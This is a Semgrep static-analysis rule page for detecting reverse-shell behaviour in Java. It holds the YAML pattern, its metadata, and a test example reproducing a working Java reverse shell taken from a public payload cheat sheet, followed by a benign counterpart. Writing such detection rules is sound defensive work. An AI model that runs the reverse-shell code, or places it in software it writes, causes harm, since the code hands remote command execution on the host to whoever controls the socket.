java.lang.security.audit.java-reverse-shell.java-reverse-shell

Author: semgrep

Semgrep found potential reverse shell behavior

Definition

rules:
  - id: java-reverse-shell
    patterns:
      - pattern-either:
          - pattern: |
              Socket $S=new Socket(...);
              ...
              InputStream $SI = $S.getInputStream();
              ...
              while(!$S.isClosed())
              {
                ...
                while($SI.available()>0)$PO.write($SI.read());
                ...
                $SO.flush();
                ...
              }
      - pattern-inside: |
          Process $P=new ProcessBuilder(...).redirectErrorStream(true).start();
          ...
          $P.destroy();
    message: Semgrep found potential reverse shell behavior
    severity: WARNING
    metadata:
      cwe:
        - "CWE-78: Improper Neutralization of Special Elements used in an OS
          Command ('OS Command Injection')"
      category: security
      technology:
        - java
      owasp:
        - A01:2017 - Injection
        - A03:2021 - Injection
      references:
        - https://owasp.org/Top10/A03_2021-Injection
      cwe2022-top25: true
      cwe2021-top25: true
      subcategory:
        - audit
      likelihood: LOW
      impact: HIGH
      confidence: LOW
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
      vulnerability_class:
        - Command Injection
    languages:
      - java

Examples

java-reverse-shell.java

// Example shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java-alternative-1
// ruleid: java-reverse-shell
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try {
        p.exitValue();
        break;
    } catch (Exception e) {
    }
}
p.destroy();
s.close();
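A benign `ok` counterpart, added here as an example and not part of the rule's test file: it keeps the same Socket / isClosed relay loop, so the pattern-either block on its own would match, but there is no enclosing `Process $P = new ProcessBuilder(...)...start(); ... $P.destroy();` range, so the pattern-inside clause fails and Semgrep reports nothing. The class name, `host` and `port` are assumptions.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class SocketRelayOk {
    // Reads everything the peer sends into an in-memory buffer and returns it.
    // The loop mirrors the rule's pattern-either block (Socket, getInputStream,
    // while(!isClosed()) { while(available()>0) write(read()); flush(); }),
    // but no ProcessBuilder is started or destroyed around it, so the
    // pattern-inside clause does not match and the rule stays silent.
    // ok: java-reverse-shell
    public static byte[] drain(String host, int port) throws IOException {
        // host and port are caller-supplied in this constructed example
        Socket s = new Socket(host, port);
        InputStream si = s.getInputStream();
        OutputStream so = s.getOutputStream();
        ByteArrayOutputStream po = new ByteArrayOutputStream();
        while (!s.isClosed()) {
            // non-blocking drain of whatever has already arrived
            while (si.available() > 0) po.write(si.read());
            so.flush();
            // blocking read: returns -1 once the peer closes its side
            int b = si.read();
            if (b == -1) break;
            po.write(b);
        }
        s.close();
        return po.toByteArray();
    }
}
```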